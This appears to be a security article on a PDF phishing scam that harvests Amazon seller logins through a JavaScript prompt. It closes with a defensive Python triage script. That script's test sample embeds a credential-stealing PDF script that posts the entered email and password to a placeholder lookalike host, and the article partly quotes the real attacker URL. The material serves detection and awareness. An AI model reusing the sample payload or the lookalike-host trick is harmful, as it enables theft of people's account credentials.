Legitimate password prompt in a protected PDF

In this scam targeting German victims, the scammers pretend to be sending you a tax invoice from Amazon and specifically state that you will need to log in to your Amazon Seller's account to view the tax invoice.

Translated Phishing Email

If you open the attached PDF file you will be shown a fake login prompt, created using JavaScript, that asks for your Amazon email address and password. Because it's a tax document and the email specifically stated that a user would have to log in to view it, some users may think this is a legitimate request and enter their login credentials.

“The document is asking the reader to log in so they can see the sent tax records. As explained in the email, this screen is to be expected, and typing the credentials into it will show the account summary information. Unusual as it may be, an unvigilant reader might brush it off as a security feature designed to keep their private information safe. But what’s going on behind the scenes?” the researchers explain.

Fake JavaScript Login Prompt

In reality, though, this login prompt is produced by a JavaScript script that submits any entered credentials to a long URL under http://sellercentral.amazon.de.56U8GTHDGT4U7YWEWE84GTYS.abecklink., which is obviously not the legitimate http://sellercentral.amazon.de. The legitimate hostname appears only as a prefix of the attacker's hostname; the part that actually decides where the request goes is the registered domain at the end of it.

Script that shows a login prompt

Once the credentials are entered, the attackers have full access to your Amazon account and can use it as if they were the legitimate owner.
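As an added example (not code from the article or from the researchers who analysed the sample), here is a small pdfid-style triage script that looks for the combination described above: a PDF that runs JavaScript on open, prompts the user, and sends data to a host that merely starts with the legitimate name. The embedded PDF objects and the placeholder host are constructed for the example; the real sample's URL is not reproduced.

```python
import re

# Constructed sample (not the real phishing PDF): raw objects with the shape the
# article describes, an /OpenAction running JavaScript that prompts for Amazon
# credentials and posts them to a lookalike host. The host is a placeholder.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
3 0 obj << /S /JavaScript /JS (
  var user = app.response("Amazon email address");
  var pw = app.response("Amazon password");
  this.submitForm({cURL: "http://sellercentral.amazon.de.PLACEHOLDER.invalid/", cSubmitAs: "HTML"});
) >> endobj
%%EOF"""

# Constructed benign document: no JavaScript, no actions.
BENIGN_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
%%EOF"""

# PDF name objects that mark active content or outbound requests.
SUSPICIOUS_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/SubmitForm", b"/URI")
URL_RE = re.compile(rb'https?://[^\s"\')]+')
# Acrobat JavaScript calls a credential-harvesting script needs: a dialog and a POST.
PROMPT_RE = re.compile(rb"app\.response|this\.submitForm|Net\.HTTP")


def is_trusted_url(url: str, trusted_domain: str) -> bool:
    """True only if the host IS the trusted domain or a subdomain of it.
    'sellercentral.amazon.de.attacker.invalid' merely starts with it and fails."""
    host = re.sub(r"^https?://", "", url).split("/")[0].split("@")[-1].split(":")[0].lower()
    return host == trusted_domain or host.endswith("." + trusted_domain)


def analyze_pdf(data: bytes, trusted_domain: str = "sellercentral.amazon.de") -> dict:
    """Triage a raw PDF: flag JavaScript that both prompts the user and talks to
    an untrusted host. Inspects only uncompressed objects."""
    keys = {k.decode(): data.count(k) for k in SUSPICIOUS_KEYS if k in data}
    urls = [u.decode(errors="replace") for u in URL_RE.findall(data)]
    untrusted = [u for u in urls if not is_trusted_url(u, trusted_domain)]
    prompt_calls = len(PROMPT_RE.findall(data))
    has_js = "/JS" in keys or "/JavaScript" in keys
    if has_js and prompt_calls and untrusted:
        verdict = "credential-phishing"
    elif has_js:
        verdict = "has-javascript"
    else:
        verdict = "clean"
    return {"verdict": verdict, "keys": keys, "urls": urls,
            "untrusted_urls": untrusted, "prompt_calls": prompt_calls}
```

Real samples usually hide the script inside FlateDecode-compressed object streams, so inflate the streams first (pdf-parser or peepdf can do this) and then run these checks over the decoded bytes.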